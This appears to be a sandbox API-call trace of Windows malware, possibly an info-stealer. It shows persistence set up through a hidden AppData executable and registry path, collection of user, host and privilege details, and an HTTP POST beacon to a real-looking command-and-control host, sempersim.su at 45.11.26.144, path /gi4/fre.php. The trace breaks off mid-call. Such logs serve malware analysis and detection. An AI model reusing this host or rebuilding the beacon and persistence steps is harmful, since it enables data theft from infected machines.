LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0125.943] CryptAcquireContextW (in: phProv=0xdfc94, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfc94*=0x0) returned 1 [0125.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0125.949] CryptAcquireContextW (in: phProv=0xdfc94, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfc94*=0x5ccb40) returned 1 [0125.958] GetProcessHeap () returned 0x5b0000 [0125.958] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0125.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0125.959] CryptImportKey (in: hProv=0x5ccb40, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfc98 | out: phKey=0xdfc98*=0x5be288) returned 1 [0125.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0125.959] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfc90*=0x1, dwFlags=0x0) returned 1 [0125.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0125.960] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418844, dwFlags=0x0) returned 1 [0125.960] GetProcessHeap () returned 0x5b0000 [0125.961] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0125.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0125.961] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5ccad8, pdwDataLen=0xdfce8 | out: pbData=0x5ccad8, pdwDataLen=0xdfce8) returned 1 [0125.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0125.962] CryptDestroyKey (hKey=0x5be288) returned 1 [0125.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0125.963] CryptReleaseContext (hProv=0x5ccb40, dwFlags=0x0) returned 1 [0125.964] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5ccad8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0125.964] GetProcessHeap () returned 0x5b0000 [0125.964] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x36) returned 0x5bde08 [0125.964] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5ccad8, cbMultiByte=-1, lpWideCharStr=0x5bde08, cchWideChar=27 | out: lpWideCharStr="������Ќ��������ь�И��Й��я��") returned 27 [0125.965] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0125.965] SHRegSetPathW (hKey=0x80000002, pcszSubKey="������Ќ��������ь�И��Й��я��", pcszValue="9EDDE9", pcszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe", dwFlags=0x0) returned 0x57 [0125.965] GetProcessHeap () returned 0x5b0000 [0125.966] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bde08 | out: hHeap=0x5b0000) returned 1 [0125.966] GetProcessHeap () returned 0x5b0000 [0125.967] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccad8 | out: hHeap=0x5b0000) returned 1 [0125.967] GetProcessHeap () returned 0x5b0000 [0125.967] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7610 | out: hHeap=0x5b0000) returned 1 [0125.970] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe", dwFileAttributes=0x2006) returned 1 [0125.972] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9", dwFileAttributes=0x2006) returned 1 [0125.972] GetProcessHeap () returned 0x5b0000 [0125.973] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2ca0 | out: hHeap=0x5b0000) returned 1 [0125.982] GetProcessHeap () returned 0x5b0000 [0125.983] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7010 | out: hHeap=0x5b0000) returned 1 [0125.985] GetProcessHeap () returned 0x5b0000 [0125.986] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5070 | out: hHeap=0x5b0000) returned 1 [0125.995] GetProcessHeap () returned 0x5b0000 [0125.995] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x2bc) returned 0x5d1e18 [0125.995] GetProcessHeap () returned 0x5b0000 [0125.995] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5cf398 [0125.995] GetProcessHeap () returned 0x5b0000 [0125.995] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x11c) returned 0x5ccad8 [0125.996] RtlGetVersion (in: lpVersionInformation=0x5ccad8 | out: lpVersionInformation=0x5ccad8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0125.996] GetProcessHeap () returned 0x5b0000 [0125.997] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccad8 | out: hHeap=0x5b0000) returned 1 [0125.997] GetProcessHeap () returned 0x5b0000 [0125.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5d54c0 [0125.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0126.001] GetUserNameW (in: lpBuffer=0x5d54c0, pcbBuffer=0xdfed0 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0xdfed0) returned 1 [0126.001] GetProcessHeap () returned 0x5b0000 [0126.002] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d54c0 | out: hHeap=0x5b0000) returned 1 [0126.002] GetProcessHeap () returned 0x5b0000 [0126.002] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5d5b38 [0126.002] GetComputerNameW (in: lpBuffer=0x5d5b38, nSize=0xdfed0 | out: lpBuffer="XC64ZB", nSize=0xdfed0) returned 1 [0126.002] GetProcessHeap () returned 0x5b0000 [0126.003] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5b38 | out: hHeap=0x5b0000) returned 1 [0126.004] GetCurrentThread () returned 0xfffffffe [0126.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0126.005] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0xdfed0 | out: TokenHandle=0xdfed0*=0x0) returned 0 [0126.005] GetLastError () returned 0x3f0 [0126.005] GetCurrentProcess () returned 0xffffffff [0126.007] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0126.008] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xdfed0 | out: TokenHandle=0xdfed0*=0x240) returned 1 [0126.008] GetProcessHeap () returned 0x5b0000 [0126.008] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5d5298 [0126.008] GetProcessHeap () returned 0x5b0000 [0126.008] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5d5d60 [0126.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0126.012] GetTokenInformation (in: TokenHandle=0x240, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xdfecc | out: TokenInformation=0x0, ReturnLength=0xdfecc) returned 0 [0126.012] GetProcessHeap () returned 0x5b0000 [0126.012] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c87a0 [0126.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0126.013] GetTokenInformation (in: TokenHandle=0x240, TokenInformationClass=0x1, TokenInformation=0x5c87a0, TokenInformationLength=0x24, ReturnLength=0xdfecc | out: TokenInformation=0x5c87a0, ReturnLength=0xdfecc) returned 1 [0126.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0126.014] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x5c87a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), Name=0x5d5298, cchName=0xdfebc, ReferencedDomainName=0x5d5d60, cchReferencedDomainName=0xdfec0, peUse=0xdfeb8 | out: Name="RDhJ0CNFevzX", cchName=0xdfebc, ReferencedDomainName="XC64ZB", cchReferencedDomainName=0xdfec0, peUse=0xdfeb8) returned 1 [0126.015] GetProcessHeap () returned 0x5b0000 [0126.015] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f44) returned 0x5d6e28 [0126.015] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0126.016] wvsprintfW (in: param_1=0x5d6e28, param_2="%s", arglist=0xdfea8 | out: param_1="XC64ZB") returned 6 [0126.016] GetProcessHeap () returned 0x5b0000 [0126.017] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf2a8 [0126.017] GetProcessHeap () returned 0x5b0000 [0126.017] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0126.017] GetProcessHeap () returned 0x5b0000 [0126.017] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c87a0 | out: hHeap=0x5b0000) returned 1 [0126.018] CloseHandle (hObject=0x240) returned 1 [0126.018] GetProcessHeap () returned 0x5b0000 [0126.018] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5d60 | out: hHeap=0x5b0000) returned 1 [0126.018] GetProcessHeap () returned 0x5b0000 [0126.018] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5298 | out: hHeap=0x5b0000) returned 1 [0126.018] GetProcessHeap () returned 0x5b0000 [0126.018] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf2a8 | out: hHeap=0x5b0000) returned 1 [0126.019] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0126.019] GetDesktopWindow () returned 0x10010 [0126.020] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0126.020] GetWindowRect (in: hWnd=0x10010, lpRect=0xdfec8 | out: lpRect=0xdfec8) returned 1 [0126.020] GetProcessHeap () returned 0x5b0000 [0126.020] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x8) returned 0x5ca960 [0126.020] GetProcessHeap () returned 0x5b0000 [0126.021] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca960 | out: hHeap=0x5b0000) returned 1 [0126.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0126.021] GetUserNameW (in: lpBuffer=0xdfcc8, pcbBuffer=0xdfed0 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0xdfed0) returned 1 [0126.022] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x76be0000 [0126.023] GetProcAddress (hModule=0x76be0000, lpProcName="NetUserGetInfo") returned 0x6f9733a0 [0126.023] NetUserGetInfo (in: servername=0x0, username="RDhJ0CNFevzX", level=0x1, bufptr=0xdfed4 | out: bufptr=0x5d2ed0*(usri1_name="RDhJ0CNFevzX", usri1_password=0x0, usri1_password_age=0x8510e1, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0126.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0126.029] AllocateAndInitializeSid (in: pIdentifierAuthority=0xdfec0, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0xdfec8 | out: pSid=0xdfec8*=0x5cf1e8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0126.029] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0126.029] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x5cf1e8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xdfecc | out: IsMember=0xdfecc) returned 1 [0126.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0126.031] GetNativeSystemInfo (in: lpSystemInfo=0xdfea4 | out: lpSystemInfo=0xdfea4*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0126.031] GetProcessHeap () returned 0x5b0000 [0126.031] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2fa8 [0126.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0126.032] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0126.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0126.037] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5ccad8) returned 1 [0126.065] GetProcessHeap () returned 0x5b0000 [0126.065] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c87d0 [0126.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0126.067] CryptImportKey (in: hProv=0x5ccad8, pbData=0x5c87d0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0126.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0126.068] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0126.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0126.069] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0126.069] GetProcessHeap () returned 0x5b0000 [0126.069] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c87d0 | out: hHeap=0x5b0000) returned 1 [0126.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0126.070] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2fa8, pdwDataLen=0xdfcfc | out: pbData=0x5d2fa8, pdwDataLen=0xdfcfc) returned 1 [0126.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0126.071] CryptDestroyKey (hKey=0x5be048) returned 1 [0126.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0126.072] CryptReleaseContext (hProv=0x5ccad8, dwFlags=0x0) returned 1 [0126.072] GetProcessHeap () returned 0x5b0000 [0126.072] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6600 [0126.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0126.073] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0126.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0126.074] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0126.075] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0126.075] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0126.076] GetProcessHeap () returned 0x5b0000 [0126.076] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb100 [0126.076] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cafc0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf1e8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0126.079] GetProcessHeap () returned 0x5b0000 [0126.079] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa20 [0126.079] socket (af=2, type=1, protocol=6) returned 0x250 [0126.079] connect (s=0x250, name=0x5cf1e8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0126.144] FreeAddrInfoW (pAddrInfo=0x5cafc0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf1e8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0126.144] GetProcessHeap () returned 0x5b0000 [0126.144] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5cc628 [0126.144] GetProcessHeap () returned 0x5b0000 [0126.144] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0126.145] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0126.146] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0126.146] GetProcessHeap () returned 0x5b0000 [0126.146] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5cc6b0 [0126.146] GetProcessHeap () returned 0x5b0000 [0126.147] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0126.147] GetProcessHeap () returned 0x5b0000 [0126.147] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d32c0 [0126.147] GetProcessHeap () returned 0x5b0000 [0126.147] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0126.147] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0126.148] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0126.149] GetProcessHeap () returned 0x5b0000 [0126.149] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5d20e0 [0126.149] GetProcessHeap () returned 0x5b0000 [0126.149] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0126.150] send (s=0x250, buf=0x5d20e0*, len=236, flags=0) returned 236 [0126.150] send (s=0x250, buf=0x5d1e18*, len=159, flags=0) returned 159 [0126.150] GetProcessHeap () returned 0x5b0000 [0126.150] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5ccd70 [0126.150] recv (in: s=0x250, buf=0x5ccd70, len=4048, flags=0 | out: buf=0x5ccd70*) returned 237 [0128.076] GetProcessHeap () returned 0x5b0000 [0128.077] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d20e0 | out: hHeap=0x5b0000) returned 1 [0128.077] GetProcessHeap () returned 0x5b0000 [0128.077] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0128.077] GetProcessHeap () returned 0x5b0000 [0128.077] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc6b0 | out: hHeap=0x5b0000) returned 1 [0128.077] GetProcessHeap () returned 0x5b0000 [0128.078] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc628 | out: hHeap=0x5b0000) returned 1 [0128.078] closesocket (s=0x250) returned 0 [0128.078] GetProcessHeap () returned 0x5b0000 [0128.078] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa20 | out: hHeap=0x5b0000) returned 1 [0128.079] GetProcessHeap () returned 0x5b0000 [0128.079] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6600 | out: hHeap=0x5b0000) returned 1 [0128.079] GetProcessHeap () returned 0x5b0000 [0128.079] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2fa8 | out: hHeap=0x5b0000) returned 1 [0128.079] GetProcessHeap () returned 0x5b0000 [0128.080] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb100 | out: hHeap=0x5b0000) returned 1 [0128.080] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5ccd70, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xd64) returned 0x250 [0128.082] Sleep (dwMilliseconds=0xea60) [0138.112] GetProcessHeap () returned 0x5b0000 [0138.112] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3350 [0138.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0138.157] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0138.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0138.184] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5ccad8) returned 1 [0138.196] GetProcessHeap () returned 0x5b0000 [0138.196] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0138.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0138.197] CryptImportKey (in: hProv=0x5ccad8, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0138.198] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0138.198] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0138.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0138.199] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0138.199] GetProcessHeap () returned 0x5b0000 [0138.200] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0138.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0138.200] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3350, pdwDataLen=0xdfcfc | out: pbData=0x5d3350, pdwDataLen=0xdfcfc) returned 1 [0138.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0138.205] CryptDestroyKey (hKey=0x5be048) returned 1 [0138.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0138.205] CryptReleaseContext (hProv=0x5ccad8, dwFlags=0x0) returned 1 [0138.205] GetProcessHeap () returned 0x5b0000 [0138.205] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5f88 [0138.206] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0138.206] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0138.207] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0138.207] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0138.208] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0138.210] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0138.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0138.211] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0138.211] GetProcessHeap () returned 0x5b0000 [0138.211] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0138.221] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0138.223] GetProcessHeap () returned 0x5b0000 [0138.223] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0138.223] GetProcessHeap () returned 0x5b0000 [0138.224] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5f88 | out: hHeap=0x5b0000) returned 1 [0138.225] GetProcessHeap () returned 0x5b0000 [0138.225] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3350 | out: hHeap=0x5b0000) returned 1 [0138.226] GetProcessHeap () returned 0x5b0000 [0138.226] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0138.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0138.227] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0138.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0138.239] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5ccad8) returned 1 [0138.248] GetProcessHeap () returned 0x5b0000 [0138.248] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8590 [0138.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0138.250] CryptImportKey (in: hProv=0x5ccad8, pbData=0x5c8590, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0138.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0138.251] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0138.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0138.254] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0138.254] 